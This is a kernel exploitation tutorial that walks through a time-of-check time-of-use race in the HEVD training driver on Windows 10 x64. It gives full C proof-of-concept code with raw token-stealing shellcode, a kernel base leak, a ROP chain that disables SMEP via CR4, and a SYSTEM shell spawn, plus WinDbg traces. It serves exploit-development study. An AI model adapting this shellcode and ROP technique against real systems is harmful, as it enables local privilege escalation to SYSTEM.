Windows 10 x64 Kernel Exploitation - Time-of-Check Time-of-Use (TOCTOU) Race Condition using HEVD

Looking at the Vulnerability

If we look at the TriggerDoubleFetch function within the HEVD driver with Binary Ninja, we can see it's a stack buffer overflow like the first blog post, except this time with a check added to ensure the buffer passed from userland is <= 0x800.

Disassembly in pseudo C

However, between the time-of-check (TOC) and time-of-use (TOU), the UserDoubleFetch->Size value could change, which makes the code vulnerable to a TOCTOU race condition.

Trigging the TOCTOU Race

I thought this would be difficult since the TOCTOU is only a couple assembly instructions, which would execute within a few nanoseconds. But it turns out its not too bad, you just need, at a minimal, two threads, one consistently calling DeviceIoControl with a small buffer size that passes the check, and one that's switching the buffer size to a bigger value. The example below uses 5 threads doing each, but I got it working with NUM_THREADS set to 1.

Some people do fancy stuff like lock the threads to different CPU cores, or change process priority, but I didn't need this, and didn't want to since the code needs to run as a low privileged user and these APIs should require privileges like SeIncreaseBasePriorityPrivilege.

#include <Windows.h>
#include <stdio.h>
#include <string.h>

typedef unsigned long long u64;

typedef struct _DOUBLE_FETCH {
    PVOID  Buffer;
    SIZE_T Size;
} DOUBLE_FETCH, *PDOUBLE_FETCH;

typedef struct _IRP_ARGS {
    HANDLE        hHEVD;
    DOUBLE_FETCH  pDoubleFetch;
} IRP_ARGS, *PIRP_ARGS;

#define ArraySize(x) (sizeof x / sizeof x[0])
#define IOCTL(Function) CTL_CODE (FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_DOUBLE_FETCH IOCTL(0x80D)

#define NUM_THREADS 5
#define BUFFER_SIZE 2500

DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {

    PIRP_ARGS pIRPArgs = (PIRP_ARGS)lpParameters;

    while (1) {
        pIRPArgs->pDoubleFetch.Size = 0x10;

        DWORD dwBytesReturned = 0;
        DeviceIoControl(
            pIRPArgs->hHEVD,
            HEVD_IOCTL_DOUBLE_FETCH,
            &pIRPArgs->pDoubleFetch,
            sizeof(DOUBLE_FETCH),
            NULL,
            0x00,
            &dwBytesReturned,
            NULL);

        Sleep(1);
    }

    return 0;
}

DWORD WINAPI SizeChaingingThread(LPVOID lpParameters) {

    PIRP_ARGS pIRPArgs = (PIRP_ARGS)lpParameters;

    while (1) {
        pIRPArgs->pDoubleFetch.Size = BUFFER_SIZE;
        Sleep(1);
    }

    return 0;
}

int main(void) {

    HANDLE hHEVD = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);


    if (!hHEVD) ExitProcess(1);

    PVOID buffer = VirtualAlloc(NULL, BUFFER_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!buffer) ExitProcess(1);

    memset(buffer, 'A', BUFFER_SIZE);

    IRP_ARGS pIRPArgs = {
        .hHEVD = hHEVD,
        .pDoubleFetch.Buffer = buffer,
        .pDoubleFetch.Size = 0,
    };

    HANDLE hThreadWork[NUM_THREADS] = { 0 };
    HANDLE hThreadRace[NUM_THREADS] = { 0 };
    
    for (u64 i = 0; i < NUM_THREADS; i++) {
        hThreadWork[i] = CreateThread(NULL, 0, DeviceIoControlThread, &pIRPArgs, 0, NULL);
        hThreadRace[i] = CreateThread(NULL, 0, SizeChaingingThread,   &pIRPArgs, 0, NULL);
    }

    Sleep(30000);

    for (u64 i = 0; i < NUM_THREADS; i++) {
        if (hThreadWork[i] != NULL) {
            TerminateThread(hThreadWork[i], 0);
            CloseHandle(hThreadWork[i]);
        }
        if (hThreadRace[i] != NULL) {
            TerminateThread(hThreadRace[i], 0);
            CloseHandle(hThreadRace[i]);
        }
    }

    return 0;
}

Disassembly in pseudo C

Getting RCE

This is exactly the same as the Stack Buffer Overflow post.

Disassembly in pseudo C

The full PoC:

#include <Windows.h>
#include <Psapi.h>

#include <stdio.h>
#include <string.h>

typedef signed char i8;
typedef short       i16;
typedef int         i32;
typedef long long   i64;

typedef unsigned char      u8;
typedef unsigned short     u16;
typedef unsigned int       u32;
typedef unsigned long long u64;

typedef struct _DOUBLE_FETCH {
    PVOID  Buffer;
    SIZE_T Size;
} DOUBLE_FETCH, *PDOUBLE_FETCH;

typedef struct _IRP_ARGS {
    HANDLE        hHEVD;
    HANDLE        hEvent;
    DOUBLE_FETCH  pDoubleFetch;
} IRP_ARGS, *PIRP_ARGS;

#define ArraySize(x) (sizeof x / sizeof x[0])
#define IOCTL(Function) CTL_CODE (FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_DOUBLE_FETCH IOCTL(0x80D)

#define NUM_THREADS 1
#define BUFFER_SIZE 2500

BOOL IsSYSTEM(void) {
    char cUsername[256];
    DWORD nameLen = sizeof(cUsername);
    GetUserNameA(cUsername, &nameLen);
    return strcmp(cUsername, "SYSTEM") == 0;
}

DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {

    PIRP_ARGS pIRPArgs = (PIRP_ARGS)lpParameters;

    while (1) {
        pIRPArgs->pDoubleFetch.Size = 0x10;

        DWORD dwBytesReturned = 0;
        DeviceIoControl(
            pIRPArgs->hHEVD,
            HEVD_IOCTL_DOUBLE_FETCH,
            &pIRPArgs->pDoubleFetch,
            sizeof(DOUBLE_FETCH),
            NULL,
            0x00,
            &dwBytesReturned,
            NULL);

        if (IsSYSTEM()) {
            printf("Overflow triggered\n");
            printf("DeviceIoControlThread thread exiting\n");
            SetEvent(pIRPArgs->hEvent);
            return 0;
        }

        Sleep(1);
    }

    return 0;
}

DWORD WINAPI SizeChaingingThread(LPVOID lpParameters) {

    PIRP_ARGS pIRPArgs = (PIRP_ARGS)lpParameters;

    while (WaitForSingleObject(pIRPArgs->hEvent, 0) != WAIT_OBJECT_0) {
        pIRPArgs->pDoubleFetch.Size = BUFFER_SIZE;
        Sleep(1);
    }

    printf("SizeChaingingThread exiting\n");
    return 0;
}

u64 GetKernelBaseAddress() {
    LPVOID drivers[1024] = { 0 };
    DWORD cbNeeded;
    EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
    return (u64)drivers[0];
}

int main(void) {

    HANDLE hEvent = CreateEventA(NULL, TRUE, FALSE, NULL);
    if (!hEvent) ExitProcess(1);

    // 1. Setup Drive Handle

    HANDLE hHEVD = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);


    if (!hHEVD) ExitProcess(1);

    // 2. Setup Shellcode

    unsigned char token_steal[] = {
      0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
      0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d, 0x8b, 0x80, 0x48, 0x04,
      0x00, 0x00, 0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88,
      0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b,
      0x88, 0xb8, 0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
      0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
      0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89,
      0x88, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00,
      0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01,
      0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
      0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0xb8, 0x02, 0x00, 0x00, 0x00, 0x0f,
      0x01, 0xf8, 0x48, 0x0f, 0x07
    };

    LPVOID shellcode = VirtualAlloc(NULL, sizeof(token_steal), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!shellcode) ExitProcess(1);

    memcpy(shellcode, token_steal, sizeof(token_steal));

    BOOL bLockRet = VirtualLock(shellcode, sizeof(token_steal));
    if (!bLockRet) {
        printf("VirtualLock failed with error %lx\n", GetLastError());
        return 1;
    }

    // 3. Get Kernel Base

    u64 kernelBase = (u64)GetKernelBaseAddress();
    if (kernelBase == 0x00) return 1;

    // 4. Setup buffer to send

    PVOID buffer = VirtualAlloc(NULL, BUFFER_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!buffer) ExitProcess(1);

    // Setup ROP Chain

    const u64 POP_RCX     = kernelBase + 0x9b2952; // pop rcx; ret;
    const u64 MOV_CR4_RCX = kernelBase + 0x9aa31b; // mov cr4, rcx; ret;

    const u64 offset = 2072;
    u64* rop = (u64*)((u64)buffer + offset);

    u64 index = 0;
    *(rop + index++) = POP_RCX;
    *(rop + index++) = 0xb50ef8 ^ 1UL << 20;
    *(rop + index++) = MOV_CR4_RCX;
    *(rop + index++) = (u64)shellcode;

    // Trigger the overflow

    IRP_ARGS pIRPArgs = {
        .hHEVD  = hHEVD,
        .hEvent = hEvent,
        .pDoubleFetch.Buffer = buffer,
        .pDoubleFetch.Size   = 0,
    };

    HANDLE hThreadWork[NUM_THREADS] = { 0 };
    HANDLE hThreadRace[NUM_THREADS] = { 0 };
    
    for (u64 i = 0; i < NUM_THREADS; i++) {
        hThreadWork[i] = CreateThread(NULL, 0, DeviceIoControlThread, &pIRPArgs, 0, NULL);
        hThreadRace[i] = CreateThread(NULL, 0, SizeChaingingThread,   &pIRPArgs, 0, NULL);
    }

    printf("Waiting for the race to trigger...\n");
    WaitForSingleObject(hEvent, INFINITE);

    STARTUPINFOW        si = { .cb = sizeof(STARTUPINFOW) };
    PROCESS_INFORMATION pi = { 0 };

    if (CreateProcessW(L"C:\\Windows\\System32\\cmd.exe",
        NULL, NULL, NULL, FALSE, 0, NULL, NULL,
        &si, &pi))
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }

    return 0;
}

Exactly-Once Delivery

Compared to the original triggering of the TOCTOU buffer overflow, I wanted to trigger it exactly once. The first step was to run a single SizeChaingingThread thread and a single DeviceIoControlThread thread. This makes controlling everything with thread synchronization primitives easier.

Then I needed a way to determine if a call to DeviceIoControl had triggered the overflow. At first, I wanted to use the return value, I thought my shellcode could set eax to something like 2 (because a BOOL is really an int) but for whatever reason, I never got the value stored in eax back as the return value of DeviceIoControl. Maybe some wrapper in NTDLL just changed it back to 1/0 to follow specification. NOTE: I realized while writing this blog I should have checked GetLastError, ohh well.

My second idea was then to check if I had a SYSTEM token. That actually requires a bunch of code (OpenProcessToken, GetTokenInformation, AllocateAndInitializeSid, etc), so it's easier to just call GetUserNameA and check for SYSTEM. And this worked fine in the PoC above.

My last idea, was to actually write back into the UserDoubleFetch->Buffer from the shellcode, and then after every DeviceIoControl call, check the Buffer. This is better because it saves calling GetUserNameA thousands of times. Lets implement this!

Pass-Back the Result

During TriggerDoubleFetch I took note of the UserDoubleFetch address (0x00000034e331f828) and UserDoubleFetch->Buffer address (0x000002194edf0000). Then once the exploit reached the shellcode, I needed to find one of these in the registers or on the stack. I managed to find the UserDoubleFetch stored on the stack in a couple locations.

2: kd> s -q rsp l10000 0x00000034e331f828
ffff818c`82c2fa10  00000034`e331f828 00000000`00000010
ffff818c`82c2fa80  00000034`e331f828 00007ffb`00000010
ffff818c`82c2fc10  00000034`e331f828 00000000`000000e0

Now we can find the offset from rsp.

2: kd> ? ffff818c`82c2fa10 - rsp
Evaluate expression: 744 = 00000000`000002e8

We have a pointer to the DOUBLE_FETCH struct. Let's dereference that to get the struct data.

2: kd> dq rsp+2e8
ffff818c`82c2fa10  00000034`e331f828 00000000`00000010

So 00000034`e331f828 holds the struct data. The first element is the Buffer, let's check.

2: kd> dq 00000034`e331f828
00000034`e331f828  00000219`4edf0000 00000000`000009c4
00000034`e331f838  00000000`00000000 00000000`00000010

So the Buffer should be at 00000219`4edf0000, let's have a look.

2: kd> dq 00000219`4edf0000
00000219`4edf0000  61413161`41306141 41346141`33614132
00000219`4edf0010  37614136`61413561 62413961`41386141
00000219`4edf0020  41326241`31624130 35624134`62413362
00000219`4edf0030  62413762`41366241 41306341`39624138
00000219`4edf0040  33634132`63413163 63413563`41346341

Yup that's our pattern, and 61413161`41306141 is offset 0.

So we can dereference rsp + 0x2e8 to get the DOUBLE_FETCH struct, then dereference that value to get the Buffer, and then dereference the Buffer to write something at offset 0.

In assembly that would be:

  mov rax, [rsp + 0x2e8]      ; Load the first pointer (poi(rsp + 0x2e8)) into rax
  mov rbx, [rax]              ; Dereference rax to get the second pointer (poi(poi(rsp + 0x2e8)))
  mov dword [rbx], 0xDEADBEEF ; Write 0xDEADBEEF to the address pointed to by rbx (poi(poi(rsp + 0x2e8)))

I added that assembly to the shellcode. Now the DeviceIoControlThread function can be updated to the below, and we can correctly determine if the DeviceIoControl call triggered an overflow and ran the shellcode by checking the value at pIRPArgs->pDoubleFetch.Buffer. Which imo is nicer than spamming GetUserNameA.

DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {

    PIRP_ARGS pIRPArgs = (PIRP_ARGS)lpParameters;

    while (1) {
        pIRPArgs->pDoubleFetch.Size = 0x10;

        DWORD dwBytesReturned = 0;
        DeviceIoControl(
            pIRPArgs->hHEVD,
            HEVD_IOCTL_DOUBLE_FETCH,
            &pIRPArgs->pDoubleFetch,
            sizeof(DOUBLE_FETCH),
            NULL,
            0x00,
            &dwBytesReturned,
            NULL);

        if (*(u32*)pIRPArgs->pDoubleFetch.Buffer == (u32)0xDEADBEEF) {
            printf("Overflow triggered\n");
            printf("DeviceIoControlThread thread exiting\n");
            SetEvent(pIRPArgs->hEvent);
            return 0;
        }

        //if (IsSYSTEM()) {
            //printf("Overflow triggered\n");
            //printf("DeviceIoControlThread thread exiting\n");
            //SetEvent(pIRPArgs->hEvent);
            //return 0;
        //}

        Sleep(1);
    }

    return 0;
}